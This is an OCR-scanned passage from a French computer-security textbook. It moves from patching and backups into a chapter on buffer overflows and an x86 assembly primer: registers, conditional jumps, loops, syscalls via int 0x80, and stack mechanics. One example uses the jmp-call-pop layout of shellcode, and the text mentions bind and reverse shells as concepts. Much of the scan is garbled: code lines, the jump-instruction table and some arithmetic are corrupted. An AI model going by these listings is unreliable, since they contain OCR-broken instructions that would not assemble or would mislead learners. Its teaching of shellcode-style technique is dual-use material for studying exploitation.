par l'automatisation du processus, surtout sur un parc informatique. Il faut 
cependant surveiller que l'application des correctifs s'est effectuée 
correctement, car automatisation n'est pas synonyme de sécurité. 


9.2.1 Mise en place des mises à jour automatiques sous GNU/Linux 


Il n'y a pas de méthodologie, cela dépend de votre système, mais la plupart 
des distributions intègrent des logiciels qui se chargent de cette tâche. 
Reportez-vous à sa documentation. 


9.2.2 Mise en place des mises à jour automatiques 
sous Microsoft Windows 


Dans le panneau de configuration, l'application Mises à jour automa- 
tique permet de définir le téléchargement puis l'installation automatique 
des correctifs. 


9.3 Les sauvegardes 


À ce stade, notre système est configuré pour faire face, dans la mesure du 
possible, aux menaces. Nous avons passé un certain temps pour protéger 
nos ressources mais, même à ce niveau, nous ne sommes hélas pas à l'abri 
d'une faille non publiée, d'une erreur de manipulation ou d'un incendie qui 
engendre la perte du matériel. La mise en place d'une politique de sauve- 
garde s'impose donc, afin de pouvoir redémarrer les services le plus 
rapidement possible. 
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D'une simple copie sur une clé USB à l'archivage quasi quotidien sur sup- 
port optique, il s'agit à nouveau ici de jauger et d'adapter la solution à la 
situation. 


De nombreux outils libres vous assistent gratuitement dans cette étape 
indispensable. 


MRemoarque 


Attention à la manière dont vous effectuez les sauvegardes et à leur stockage, 
il serait dommage d'avoir sécurisé le système et qu'une attaque réussisse sur la 
sauvegarde. 


10.Bilan 


La sécurité des systèmes n'est pas chose aisée car la menace peut provenir 
de multiples sources. Virtualisation, séparation des privilèges et définition 
des bons droits sont donc vos outils. Mais il faut être très vigilant car une 
erreur de configuration peut mettre en défaut toute votre sécurité. 


À ce côté maîtrisé, nous pouvons ajouter les failles de sécurité des logiciels 
et la négligence des utilisateurs. Ces derniers doivent donc être bien infor- 
més et intégrés au processus de sécurité. Les mots de passe doivent donc 
être intelligemment choisis et les mises à jour des systèmes suivies. 


Enfin, une surveillance active par les journaux systèmes et des sauvegardes 
à jour sont vos garde-fous en cas d'attaques. 
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1. Généralités 


Les attaques par buffer overflow sont parmi les plus répandues. Elles repré- 
sentent environ 60 % des attaques connues. Il s'agit d'exploiter un bug 
dans la gestion de zones mémoires déclarées dans le programme, afin de lui 
faire exécuter une action qu'il n'était pas censé faire. 


De manière générale, le pirate essaiera d'obtenir un accès distant à la ma- 
chine victime en prenant le contrôle sur le shell (ligne de commande sous 
Linux). Suivant la méthode utilisée, on appelle cela un "bind de shell" ou 
un "reverse connexion”. 


Cela sera essayé sur un binaire ayant le SUID root (sous Linux, c'est-à-dire 
un programme qui se lance au démarrage avec les droits de l'administra- 
teur), afin d'élever ses privilèges, jusqu'au statut de root. 


Pour arriver à cela, il faut être très familier avec l'assembleur, avoir des 
notions de programmation et bien connaître la structure et le fonctionne- 
ment d'un ordinateur et surtout du microprocesseur. 
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2.2 


2.2.1 


2.2.2 


Sécurité informatique 


Apprendre l'attaque pour mieux se défendre 


Notions d'Assembleur 


Introduction 


Il faut savoir quand écrire en assembleur : il y a des moments où il n'y a 
pas d'autres possibilités que d'écrire en assembleur et d'autres où l'assem- 
bleur n'est pas utile. Le système d'exploitation, mais aussi un bon nombre 
de produits standard sont programmés de telle sorte que l'assembleur est 
simplement inévitable. Le Reverse engineering, les failles applicatives sont 
des exemples où l'assembleur est omniprésent. 


Premiers pas 


Apprenons à compter 


Nous avons déjà tous rencontré dans nos lectures des nombres en hexadé- 
cimal ou en binaire. Le binaire est le langage des PC, que nous écrivions des 
programmes en assembleur, en C ou tout autre langage, le PC comprend le 
binaire, il parle en binaire. 


L'hexadécimal est fait pour permettre aux humains une meilleure compré- 
hension du langage PC. 


Le binaire 
Le binaire est composé de deux éléments : le O et le 1. 


Une suite de huit éléments binaires est appelée un octet, une suite de seize 
éléments binaires est appelée un mot (2 octets) et une suite de trente deux 
éléments binaires est appelée un double mot (4 octets). 


Les microprocesseurs Intel sont composés de registres. Nous utiliserons ces 
registres pour commencer à travailler avec l'assembleur. 
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EAX, EBX, ECX et EDX sont des registres 32 bits. Ils contiennent respecti- 
vement AX, BX, CX, DX (16 bits) dans leur partie basse qui eux-mêmes 
sont composés de AH, BH, CH, DH (8 bits) dans la partie haute et de AL, 
BL, CL, DL (8 bits) dans leur partie basse. Voici un petit schéma qui 
illustre ceci : 


E Remarque 


Les registres EAX, EBX, ECX et EDX ne sont disponibles qu'en mode protégé 
(32 bits). 


Prenons l'exemple du registre EAX de 32 bits (0 à 31). Pour désigner les 
16 bits de poids faible, nous utilisons AX. Nous pouvons découper le 
registre AX en deux parties : AL les 8 bits de poids faible et AH les 8 bits 
de poids fort. Il existe d'autres registres que nous verrons au fur et à me- 
sure de ces pages. 


Pour mettre une valeur dans le registre EAX, nous utiliserons l'instruction 
mov. Cette instruction permet de copier un octet ou un mot d'un opérande 
source vers un opérande destination. 


mov eax,10100101010010101001010101101101b 
mov ax,1011100101010101b 

mov a1l,10110101b 

mov Df an 


Dans le premier exemple, on copie un double mot dans EAX, dans 
l'exemple 2 on copie un mot dans AX, dans l'exemple 3 on copie un octet 
dans AL et dans l'exemple 4, on copie le contenu de AL dans BL. Le petit b 
à la fin de chaque nombre signale à l'assembleur que nous travaillons en 
binaire. 
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Nous pouvons, à partir du binaire, retrouver le nombre en décimal. Pour 
cela il suffit de savoir comment se décompose un nombre. 


Prenons un exemple, le nombre 1354 en décimal se décompose comme 
suit : 


1354 = 1 x 1000 + 3 x 100 +5x10+4x1 

SARL +3x10 +5x10! + 4x10? 

Le 10 correspond à la base utilisée et l'exposant est le poids. 
Nous allons faire la même chose pour un nombre binaire : 
101101= 1x25 + 0x24 + 1x28 + 1x2? + 0x2! + 1x2? 

= 1x32 + 0 + 1x8 + 1x4 + 0 + 1x1 
=32+8+4+1=45 


Nous venons donc de traduire ce nombre binaire en décimal. 


L'hexadécimal 


L'hexadécimal est une base 16, c'est-à-dire que l'on va écrire un nombre à 
l'aide de 16 symboles : les chiffres de 0 à 9 et les lettres de A à F. 
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Nous allons pour cela utiliser le tableau donné ci-dessous : 


Hexadécimal 


00000110 | 

00000111 007 07 
00001000 1010 
00001001 


ĮJTrente-deux 


Pour passer du binaire à l'hexadécimal, il suffit donc de remplacer par bloc 
de quatre bits le nombre binaire par son équivalent en hexadécimal. 


Nous faisons de même pour passer de l'hexadécimal au binaire. 
F54Bh =1111 0101 0100 1011 b 

1101101101001b=1B69h 

Exemple de programme : 

mov EAX,19h ; on copie 19 (en hexa) dans EAX 

add EAX,21h ; on additionne 21 (en hexa) à 19 (en hexa) 

mov EBX,EAX ; on copie le résultat de l'opération dans EBX 
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Quand on effectue une opération d'addition avec l'instruction ADD, le 
résultat de l'opération se retrouve dans le registre utilisé (ici EAX). 


Comment tester nos programmes ? 


Squelette d'un programme en assembleur 


Dans les pages suivantes, pour tester nos programmes ou simplement tes- 
ter les instructions, nous utiliserons le squelette du programme qui se 
trouve ci-dessous. Ne nous occupons pas pour l'instant de savoir à quoi cor- 
respond chaque instruction, nous les découvrirons au fur et à mesure de 
notre avancement. 


Squelette du programme assembleur : 


include“ "tasm io.inc'' 
segment .data 
;Les données initialisées sont placées dans ce segment de données 


segment .bss 
;Les données non initialisées sont placées dans le segment bss 


segment .text 

global _asm main 
_asm_main: 

enter 0,0 

pusha 


;Le code est placé ici 


popa 
mov eax,0 
leave 

ret 


Nous n'aurons qu'à reprendre ce squelette de code pour y placer notre pro- 
gramme aux endroits indiqués. 


Installation sous Debian : apt-get install nasm 
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Une fois le programme écrit et enregistré avec l'extension .asm (exemple : 
premier.asm), il faudra assembler le code : 


nasm -f format premier.asm 


où format prendra l'une des valeurs suivantes : coff, elf, obj ou 
win32 suivant le compilateur utilisé. 


Nous ne pouvons pas pour l'instant lancer le programme ainsi compilé. 
Nous allons créer un programme en langage C qui nous servira à lancer 
notre programme en assembleur. 


Pourquoi utiliser un programme en C pour lancer notre programme en 
assembleur ? Parce que pour l'instant nous débutons en assembleur et grâce 
à cette astuce, nous pourrons utiliser la bibliothèque standard du C afin de 
récupérer des données au clavier, écrire à l'écran... 


Programme en C : 


int main () 

{ 

int ret status; 

ret status= asm main(); 
return ret status; 


} 


Il faut maintenant compiler le programme en C en incluant notre pro- 
gramme en assembleur. 

- Compiler : gcc -c progC.c 

- lier : gcc -o premier progC.o premier.o asm_ io.0o 


Nous obtenons ainsi un programme appelé premier que nous pouvons lan- 
cer. 


Nous aurions pu faire directement : 


] gcc -o premier progc.c premier.o asm io.o 


L'include asm-io. inc se trouve à l'adresse suivante : 
http://www.drpaulcarter.com/pcasm/ 
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Cet include se trouve dans le fichier linux-ex.zip sous Linux ou ms-ex.zip 
sous Windows. Il nous suffit de télécharger le fichier, de le placer dans le 
répertoire où se trouveront les programmes que nous allons créer. 
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2.3.2 Notre premier programme 


Écrivez le programme suivant et créez l'exécutable comme décrit dans le 
paragraphe précédent. 


$include “tasm io.inc'' 


segment .data 
prompti db "Entrez un nombre :",0 
prompt2 db "Entrez un deuxieme nombre : ",0 
prompt3 db "le résultat est : ",0 
segment .bss 
nbr ÉFesb: A 
segment .text 
global asm main 
_asm main: 
enter 0,0 
pusha 
mov EAX,promptl 
call print String 
call read int 
mov [nbr] ,EAX 
mov EAX,prompt2 
call print string 
call read int 
add EAX, [nbr] 
mov EBX,EAX 
mov EAX,prompt3 
call print string 
mov EAX,EBX 
call print int 
popa 
mov eax,0 
leave 
ret 


Essayons de comprendre ce programme. En dessous du segment .data, nous 
déclarons trois phrases qui nous serviront plus tard pour poser des ques- 


tions à l'utilisateur. 
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En dessous de segment .bss, nous réservons en mémoire un octet (byte). 


Pour afficher un message à l'écran, nous devons mettre dans EAX l'adresse 
de départ de la phrase (par exemple : mov EAX,prompti) et nous devons 
appeler ensuite print string grâce à la fonction call. 


Pour récupérer une touche tapée au clavier, nous appelons (call) read_ int 
qui place dans EAX la valeur tapée. 


Les autres instructions ont déjà été vues précédemment. Il reste peut-être 
une ombre encore qui est : mov [nbr] EAX. 


nbr est le nom de l'octet que nous avons réservé tout à l'heure. Grâce à 
cette instruction, nous plaçons la valeur contenue dans EAX dans la case 
mémoire nbr. Donc [nbr] veut dire : contenu de l'adresse mémoire nbr. 


2.4 Les instructions 


2.4.1 La comparaison 


En désassemblant des programmes nous pouvons remarquer que l'instruc- 
tion cmp est utilisée. Quel est son but et que fait-elle ? 


Le résultat d'une comparaison est stocké dans le registre FLAGS pour être 
utilisé si nécessaire un peu plus tard. Les bits du registre FLAGS sont posi- 
tionnés suivant le résultat de la comparaison : 


cmp opérandel, opérande2 
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32-Bit EFLA@-Register 


16-Bit FLAG-Register 


í Alignment Check - 


xX 
Virtual 8886 Mode - X 
Resume Flag - X 
Nested Task Flag- X 
I/O Privilege Level- X 
80436 TT Overlow-S 
Direction Flag - C 
xX 

S 

S 

S 

S 

S 

S 


à Interrupt Enable - 


30286 < TrapFleg- 
2036 
80186 


Sign Flag - 
Zero Flag - 
Auxiliary Flag - 
i Parity Flag - 
Cany Fleg - 


Status-Flags (S) Control-Flags (C) System-Flags (X) 


Ce qu'il faut comprendre avec cmp c'est que l'on effectue une opération 
entre les deux opérandes opérande1 - opérande2. Le registre FLAGS est 
positionné mais le résultat de l'opération n'est pas stocké. 


Les sauts qui vont suivre sous le cmp vont aller « regarder » l'état de cer- 
tains bits du registre FLAGS et agir en conséquence. 


Par exemple si opérande1 = opérande2, le cmp va positionner le bit ZF 
(zéro Flag) à 1. 


Une chose importante à ne pas oublier est que certaines autres instructions 
positionnent aussi le registre FLAGS. 


© Editions ENI - Toute reproduction interdite 


Les failles applicatives -=a ]/9 
Chapitre 8 


2.4.2 L'instruction IF 


Soit le pseudo-code suivant : 


¿if (EAX==0) 
EBX=1; 
else 
EBX=2; 


Si l'on veut traduire cela en assembleur, nous obtenons : 


cmp eax, 0 
Jz bcl 
mov ebx,2 
jmp suivant 
pelz 
mov ebx,1 
suivant : 


Nous nous retrouvons ici avec deux nouvelles instructions jz et jmp. 


jmp (jump)est ce qu'on appelle un saut inconditionnel, c'est-à-dire que si 

le programme arrive à cette ligne, quel que soit l'état du registre FLAG, le 
prog gne, quel q 8 , 

programme sautera à l'adresse correspondante, c'est-à-dire ici @suivant. 


jz (jump if zero) : pour cette instruction, le programme ira à 
l'adresse de bcl seulement si le bit ZF du registre FLAG est positionné à 1. 
Sinon, l'instruction jz est sautée et c'est le mov ebx, 1 qui est exécuté. 


Voici un autre exemple : 


if(EAX>=5) 
EBX=1; 
else 
EBX=2; 
donnera : 
cmp eax, 5 
jge bcl 
mov ebx, 2 
jmp suivant 
Del: 
mov ebx, 1 


M suivant: 
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Nous retrouvons ici la même structure que précédemment, la seule nou- 
veauté est le jge. 


jge (jump if greater or egal) : cette instruction va permettre 
de sauter à l'adresse voulue si le résultat de l'opération (cmp) est supérieur 
ou égal. 


La boucle FOR 


Pseudo-code : 


var = 0; 
for(i=10;i>0;i--) 
var+=1l}; 


Ce pseudo-code peut être traduit en assembleur comme ceci : 


mov eax,0 

mov ecx,10 
bed: 

add eax,eCcx 

loop bcl 


L'instruction loop se sert du registre ecx. En effet, pour chaque passage 
dans loop, ecx est décrémenté et tant que ecx n'est pas égal à 0, l'ins- 
truction loop boucle vers bc1. 


Aussitôt que ecx sera égal à zéro, Loop ne bouclera plus vers bc1 et l'ins- 
truction suivante (en dessous de Loop) sera exécutée. 


Il existe d'autres variantes de loop : 


LOOPE, LOOPZ qui décrémentent ECX et sautent à l'adresse (ou éti- 
quette) indiquée si ECX est différent de 0 et ZF égal à 1. 


LOOPNE, LOOPNZ qui décrémentent ECX et sautent à l'adresse (ou éti- 
quette) indiquée si ECX est différent de 0 et ZF égal à 0. 
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2.4.4 La boucle WHILE 


While(condition) 


{ 
corps de la boucle; 


} 


Le pseudo-code précédent sera traduit par : 


bets 
jxx fin 
;corps de la boucle 
jmp pel 

EDk 


À la place de jxx, bien sûr, nous devons choisir l'instruction qui correspond 
à la condition (je, jne, jge, jle...). 


2.4.5 La boucle DO WHILE 


Do 
{ 
corps de la boucle; 
}while (condition); 
Le pseudo code précédent sera traduit par : 
pel 
;corps de la boucle 
¿code pour positionner FLAGS suivant la condition 
jxx bel 
même remarque que précédemment pour le jxx. 
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La liste ci-dessous vous fournira toutes les possibilités de sauts condition- 
nels et inconditionnels pour créer des tests de comparaison : 


Jumpif Above = JNBEÏbranchement cond: (op? > opl) 
Jump 1f Above or Eq. =JNBlbranchement cond. (op2 $> op1) 
Jump if Below =JNAEÏbranchement cond. (op2 < opł) 
Jump 1f Below or Eq. =INAlbranchement cond. (op? < op1) 


opérandes 
absolues 


JumpifCX=0 

Jump 1f Equal 

Jump 1f Greater = 
Jump 1f Greater or Eq. 
INL 

Jump if Less = 
Jump 1f Less or Equal 
JNG 

Jump 

Jump if Not-Above 


branchement s CX = 0 
=JZ]branchement cond. (op? = op1) 
JNLEjbranchement cond. (op2 > op P) 
=|branchement cond. (op2 2 op1) 


JNGE|branchement cond. (p2 < op1) 
=[branchement cond. (op2 $ ep1) 


branchement inconditionnel 
= JBElbranchement cond. (op? < op1) 


Jump if Not Above or Eq ={branchement cond. (op2 < opł) 
JB 

Jump 1f Not Below  =JAElbranchement cond. (op? > op1) 
Jump if Not Below or Eq. =fbranchement cond. (op? > opt) 
JA 

Jump if Not Equal =JNZ|branchement cond. (op2 # op1) 
Jump if Not Greater =JLE|branchement cond (op2 S op1) 
Jump 1f Not Greater or Eq. [branchement cond. (op? < op1) 
=JL : 
Jump if Not Less =JGEÏbranchement cond (ep2 > op1) 
Jump 1f Not Less or Eg. =|branchement cond. (op? > opl} 
JG 

Jump if Not Overflow branchement cond. (si pas ‘overflow’) 
Jump 1f Not Panty =JPO|branchement cond. (si parité impaire} 
Jump if Not Siga branchement cond. (si valeur posiwve) 
Jump 1f Not Zero = JNElbranchement cond. (si résultat! 4% 0) 
Jump if Overflow branchement cond. (si ‘overflow') 
Jump if Panty = JPEÏbranchement cond. (si parité paire) 


opérandes 
absolues 
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Jump if Panty Even. =JPlbranchément cond (si panté paire) 
Jump if Panty Odd  =JNPlbranchement cond. (s1 parité impaire) 
Jump if Sign branchement cond. (si valeur négative) : 
Jump if Zero = JEbranchement cond. (si résultat = 0) 
Load AH with Flags bits anthmétiques du ‘flag-reg > AH 
Load pointer to DS adresse de op? > DS:opl 
Load Effective Addr: adresse de op? * opl 
Load pointer to ES adresse de op2 > ES'opl 
réservation du bus pour > 1 cycle 
Load Byte cone-mémoire > AL 
Load Word one-mémoire + AX 
branchement si CX= 0 
LOOPE Loop while Equal =LOOFZ branchement si CY=0 et ZF= | 
LOOPKE Loop while Not Eq. =LOO- [branchement st CY=0 et ZF=0 
ENZ 
LOOPNZ Loop while Not Zero =|branchement si CY=0etZzr=0 
LOOPNE 
LOOPZ Loop while Zero —=LOOPE|branchement sı CY=0etZzF=1 


l ère action: 
-> CX 


CX-—1 


2.4.6 La directive Zdefine 
Cette directive est semblable à celle de la directive #define du C. 
define SIZE 100 
%define ch1 dword [ebp+8] 
%define ch2 dword [ebp+12] 


Nous venons ici de définir trois variables SIZE, ch1 et ch2 qui vont prendre 
des valeurs pour tout le programme. 
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2.4.7 Directives de données 


2.4.8 


L1 db 0 ; octet libellé L1 avec une valeur initiale de 0 

L2 dw 1000;mot libellé L2 avec une valeur initiale de 1000 
L3 db 110101b;octet initialise à la valeur binaire 110101 

L4 db 12h;octet initialise à la valeur hexa 12 

LS db l7o;octet initialise à la valeur octale 17 


L6 dd 1A92h;double mot initialise à la valeur hexa 1492 
L7 resb 1 ; un octet non initialise 


L8 db ''A'!; octet initialise avec le code ASCII du A 

L9 db 0,1,2,3 ; definit 4 octets 

L10 db PSN DT ME 0 définit: une. Chaine. "salue"! 
Lt, db 'salut',0 ; idem L10 


L12 temps 100 db 0 ; équivalent à 100 (db 0) 
L13 resw 100 ; réserve de la place pour 100 mots 


Exemples d'utilisation : 


mov al,[Ll] ; copie l'octet situé en L1 dans al 
mov eax,Ll ; EAX=adresse de l'octet en L1 
mov [L1],ah ; copie ah dans l'octet en L1 


mov dword [L6],1 ; stocke 1 en L6 


Cela indique à l'assembleur de stocker la valeur 1 dans le double mot qui 
commence en L6. Les autres spécificateurs de taille sont : BYTE, WORD, 
QWORD et TWORD. 


Entrées - sorties 


Les langages assembleur n'ont pas de bibliothèques standard. Ils doivent 
accéder directement au matériel ou utiliser des routines de bas niveau éven- 
tuellement fournies par le système d'exploitation. 


Il est très courant pour les routines assembleur d'être interfacées avec du C. 
Un des avantages est que le code assembleur peut utiliser les routines d'E/S 
de la bibliothèque standard du C. 


Pour utiliser ces routines, il faut inclure un fichier contenant les informa- 
tions dont l'assembleur a besoin. 


sincliude' 'asm io.inc'' 
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Pour utiliser une de ces routines d'affichage, il faut charger EAX avec la 
valeur correcte et utiliser une instruction CALL pour l'invoquer. 


Nous pourrons donc utiliser : 


print_int 


print_char 
print string 


print _nl 
read_int 


read_ char 


Affiche à l'écran la valeur d'un entier stocké dans EAX. 


Affiche à l'écran la valeur d'un code ASCII, stocké dans 
AL. 


Affiche à l'écran la valeur d'une chaîne de caractères 
(stockée dans EAX). 


Va à la ligne. 
Lit un entier au clavier et le stocke dans le registre EAX. 


Lit un caractère au clavier et stocke son code ASCII dans 
le registre EAX. 


Cette bibliothèque contient également quelques routines de débogage : 


dump_regs 


dump_mem 


dump_stack 


dump_math 


Affiche les valeurs des registres, des flags. 


Affiche les valeurs d'une certaine région de la mémoire. 
Elle prend trois arguments séparés par des virgules (un 
entier utilisé pour étiqueter la sortie, l'adresse à afficher 
et le nombre de paragraphes de 16 octets à afficher après 
l'adresse). 


Affiche les valeurs de la pile du processeur. 


Affiche les valeurs des registres du coprocesseur mathé- 
matique. 


Nous lancerons notre programme assembleur à partir d'un programme en 


C(t progC e): 


int main () 


{ 


int ret status; 
ret_status=asm main(); 
return ret status; 


} 
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Le squelette de notre programme en assembleur sera de cette forme 
(essai.asm) : 


include "asm io.inc" 
segment .data 


segment .bss 


segment .text 
global asm main 

asm main: 
enter 0,0 ; setup routine 
pusha 


| popa 
mov eax, 0 ; return back to C 
leave 
ret 


Dans le segment .data doivent se trouver seulement les données initialisées. 
Les données non initialisées se trouveront dans .bss. 


Le segment de code est appelé .text. 


2.5 Les interruptions 


Les interruptions sous Linux (int 0x80) sont détaillées sur ce site : 
http://docs.cs.up.ac.za/programming/asm/derick tut/syscalls.html 


Dans le tableau, vous trouverez un extrait des interruptions d'appel sys- 
tème que l'on appelle "syscall". 


br 
const char * 
int 


“const char * 
lconst char * 
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Exemple : bonjour, tout le mondel, en C. 


Int main() { 

char *string="'bonjour, tout le monde! ; 
write(l,string,23); 
} 


Nous voulons, en assembleur, obtenir la même chose que le programme en 
C. Il nous faut donc utiliser des interruptions pour, par exemple, écrire à 
l'écran une phrase ou quitter le programme (exit). 


En assembleur, nous allons obtenir le programme ci-après : 


| Xor eax,eax 

xor ebx,ebx 

XOr ecx,ecx 

xor edx,edx 

jmp short string 
code: 

pop ecx 

mov bE; 

mov d1l,23 

mov al,4 

int 0x80 

dec bl 

mov al,1 

int 0x80 

string : 

call code 

db ‘bonjour, tout le monde!" 


La partie XOR eax, eax par exemple, sert simplement à mettre à zéro le 
registre eax. Une bonne habitude est de mettre à zéro les registres que nous 
voulons utiliser. 


Si l'on regarde dans la table des syscalls donnée plus haut, le write est de la 
forme : write(1,string,23). 


Si l'on veut utiliser la fonction write, il faut mettre la valeur 4 dans al. 
Mais au préalable, il faut lui indiquer quelques arguments. 
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D'abord, voulons-nous travailler avec l'entrée standard (le clavier : 0) ou la 
sortie standard (l'écran :1) ou enfin avec la sortie d'erreur (2) ? Nous vou- 
lons bien sûr visualiser le résultat sur l'écran, nous mettrons donc 1 dans 


bl. 


Il faut ensuite indiquer la taille de la chaîne de caractères que nous voulons 
écrire, soit pour nous 23 que nous plaçons dans dl. 


Il nous reste ensuite à placer dans ecx l'adresse de la chaîne de caractères. 
Ce qui est fait dans l'exemple par une petite astuce : nous faisons d'abord 
un jmp short string qui va permettre de sauter a l'étiquette string : qui fait 
appel à code. 


Ce mécanisme permet de mettre dans la pile l'adresse de retour, soit 
l'adresse de db "bonjour, tout le mondel". 


Dès l'arrivée dans le sous-programme code, nous faisons un pop ecx qui per- 
met de placer dans ecx l'adresse voulue. 


Nous pouvons donc maintenant appeler l'interruption int 0x80 qui va donc 
écrire à l'écran la phrase voulue. 


L'interruption int 0x80 est utilisée aussi pour sortir du programme (exit() ) 
en plaçant la valeur 0 dans bl (dec bl qui valait 1) et en plaçant 1 dans al. 


Les sous-programmes 


Dans un langage de haut niveau, la création d'unités fonctionnelles, appe- 
lées fonctions ou procédures ou sous-programmes, est importante. Tout 
problème complexe doit être divisé en tâches élémentaires qui permettent 
de mieux le comprendre, le mettre en œuvre, le tester. 


Deux instructions vont nous être utiles : CALL et RET. 


L'instruction CALL effectue un saut inconditionnel vers un sous-pro- 
gramme et empile l'adresse de l'instruction suivante. 


L'instruction RET désempile une adresse et saute à cette adresse. 
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L'instruction CALL permet d'appeler un sous-programme en obligeant le 
processeur à poursuivre l'exécution à un autre endroit que la ligne qui suit 
cette instruction CALL. Le corps du sous-programme comprend en réponse 
une instruction RET qui permet de revenir à l'instruction qui suit le CALL. 


D'un point de vue technique, l'instruction CALL provoque le positionne- 
ment de l'adresse de retour sur la pile et la copie de l'adresse du sous-pro- 
gramme qui doit être appelé dans le pointeur d'instruction. Dès que le 
sous-programme a terminé son exécution, son instruction RET provoque le 
désempilement de l'adresse de retour dans le pointeur d'instruction. 


Le processeur exécute toujours l'instruction dont l'adresse est indiquée dans 


ETF 


La structure d'un sous-programme sera la suivante : 


sousp: 
push ebp ¿empile la valeur originale de ESP 
mov ebp,esp ;EBP=ESP 


sub esp,octets locaux ; nombre d'octets nécessaires pour les locales 
; instruction du sous programme 


mov esp,ebp -désalloue les locales 
pop ebp ¿restaure la valeur originale de ESP 
ret 


L'appel du sous-programme dans le programme principal ou dans un autre 
sous-programme sera : 


f call sousp 


Les paramètres du sous-programme peuvent être passés par la pile. Ils doi- 
vent être empilés avant l'instruction CALL. Si le paramètre doit être modi- 
fié par le sous-programme, l'adresse de la donnée doit être passée, pas sa 
valeur. Si la taille du paramètre est inférieure à un double mot, il doit être 
converti en un double mot avant d'être empilé. 
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Le heap et la stack 


Le heap 


Le heap est la région mémoire dédiée à l'allocation dynamique de la 
mémoire. Gérer dynamiquement de la mémoire signifie que l'on peut 
allouer ou libérer des régions mémoire à volonté dans la limite des ressour- 
ces disponibles. 


Le heap n'est pas souvent utilisé en assembleur car pour l'utiliser avec effi- 
cacité, il est nécessaire de disposer de moteurs d'allocation et de libération 
de la mémoire. Ces moteurs d'allocation sont simplement des fonctions tel- 
les malloc(}/free() disponibles dans toute librairie C. 


Il n'est pas question de recoder des fonctions de gestion de la mémoire en 
assembleur. Les algorithmes existants (les choix varient d'un système à un 
autre) sont optimisés et les recoder demande des notions de programma- 
tion bien précises (listes chaînées par exemple). 


En fait, en tant que débutant, nous n'utiliserons jamais le heap, sauf si 
nous savons exactement pourquoi. Nous ferons essentiellement des alloca- 
tions mémoire sur la stack. 


La stack 


La stack est la région mémoire la plus utile d'un programme. Elle se situe 
constamment, quel que soit le système utilisé, dans les adresses hautes de 
la mémoire. Depuis un programme utilisateur la mémoire est visible sous 
une forme linéaire. Partant de l'adresse 0x0 jusqu'à l'adresse OXxFFFFFFFF, ce 
sont plus de quatre giga-octets de mémoire qui semblent disponibles. Qui 
"semblent" car en réalité le système d'exploitation utilise des régions 
mémoire de cet ensemble, les rendant indisponibles. De même, les librairies 
chargées par l'application utilisent aussi des régions mémoire de cet espace 
virtuel. 


Un programme se moque de la localisation de la stack, il l'utilisera de façon 
aveugle là où on lui dira de le faire. 
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Elle lui sert à empiler des données, comme les variables temporaires d'une 

sous-fonction, ou encore les adresses de retour d'une fonction. Notre but 

est d'expliquer l'utilité de la stack dans le cadre du développement en 

assembleur. La stack va servir au code pour : 

- sauvegarder des valeurs numériques en mémoire (nombres, adresses) pour 
libérer des registres, 

- sauvegarder des registres avant d'appeler une sous-fonction qui risque de 
les modifier, 

- transmettre et récupérer des arguments dans une fonction, 

- réserver des buffers (pour des copies de chaînes de caractères par 
exemple), 

- appeler et retourner des fonctions. 


Lorsque nous utilisons la pile, nous empilons les données par le bas. Autre- 
ment dit, la pile croît vers les adresses basses. Faisons une métaphore ; ima- 
ginez une pile d'assiettes posée par terre. Maintenant, accrochez-la au pla- 
fond. Toute nouvelle assiette que l'on ajoute à cette pile sera ajoutée par le 
bas. Sous la pile, il n'y a rien que de l'air (une partie de l'espace mémoire 
virtuel est vide sous la stack), et le sol est la prochaine région mémoire uti- 
lisée. La pile ne s'étendra pas au-delà. 


La stack s'élargit donc vers le bas mais on la parcourt néanmoins comme 
toute autre région mémoire : des adresses basses vers les plus hautes. 


L'instruction qui permet de rajouter une assiette (une donnée) est "Push". 
L'instruction qui permet d'enlever une donnée est "Pop". 


Push prend un argument (un registre, si l'on veut mettre le contenu d'un 
registre sur la stack, ou une valeur immédiate, c'est-à-dire un nombre). 


Pop prend un registre comme argument (la valeur prise de la stack est 
transférée vers le registre). 


Notez que l'on n'empile et ne désempile que des données de deux ou quatre 
octets (mot et double mots) à l'aide de Push/Pop. 
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Revenons à notre plafond (notre pile d'assiettes y est toujours accrochée) et 
continuons le bricolage. Prenons une fourchette et attachons-lui un fil. 
Accrochons le fil, à côté de la pile d'assiettes pour que la fourchette pende 
au niveau du bas de la pile. Ses dents pointent sur le bas de la pile. Quand 
nous rajouterons une assiette, cette fourchette devra descendre pour conti- 
nuer à pointer sur le bas de la pile. Et quand nous retirerons une assiette, la 
fourchette devra remonter d'un cran. 


Notre fourchette, c'est le registre ESP (Extended Stack Pointer) du processeur. 
ESP pointe toujours sur le bas de la pile. Lorsque l'on fait Push/Pop, ESP est 
automatiquement incrémenté ou décrémenté de deux ou quatre octets. 
Nous pouvons modifier directement ESP mais jamais à la légère. 


Si l'on veut allouer 64 octets sur la pile (pour sauvegarder temporairement 
une signature numérique par exemple) on ne va pas faire 16 push et consi- 
dérer que ESP pointe sur notre nouveau buffer. On peut directement le dé- 
crémenter de 64 octets (on utilisera toujours des multiples de 4 dans ce 
genre d'opération, pour des raisons inexplicables ici, mais vitales). 


Comme ESP contient une adresse qui pointe sur le bas de la stack, il suffit 
de soustraire 64 à ESP pour qu'il pointe 64 octets plus bas, et ainsi nous 
élargissons la stack de 64 octets. Nous avons alors 64 octets disponibles 
au-dessus de ESP. N'oubliez jamais de libérer cet espace en additionnant 64 
à ESP avant la fin de la fonction ou il en coûtera un bug fatal. 


Prologue et épilogue : des notions fondamentales 


Pour appeler une fonction, nous utilisons Call. Call va mettre l'adresse de la 
prochaine instruction qui le suit sur la pile (donc décrémenter ESP de 
quatre octets) et sauter sur l'adresse qui lui a été passée en paramètre (par 
valeur immédiate ou registre). L'exécution saute alors sur la nouvelle 
fonction. 


ESP pointe alors dans la stack sur l'adresse de retour de celle-ci, c'est-à-dire 
l'adresse où reprendra l'exécution après le retour de la fonction (juste après 
le Call). Le retour de la fonction se fait par l'instruction "Ret". Ret prend la 
donnée (l'adresse) pointée par ESP, la désempile de la stack et l'exécution 
saute sur cette adresse (la valeur est mise dans le registre EIP). 
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Il est donc important que ESP pointe sur une adresse de retour au moment 
du Ret ou le bug est assuré. 


Call/Ret, tout comme Push/Pop, modifient automatiquement le registre 
ESP. Si l'on doit passer des paramètres à une fonction, la méthode la plus 
courante consiste à empiler les arguments à l'aide de Push (uniquement des 
valeurs numériques ou des adresses) avant de faire le Call. Après le Call, les 
arguments seront ainsi quatre octets suivant l'adresse de retour sauvegardée 
pointée par ESP. 


Reprenons. Juste après le Call, au moment où l'exécution rentre dans la 
sous-fonction (dans le code source, Call prend en paramètre une adresse, 
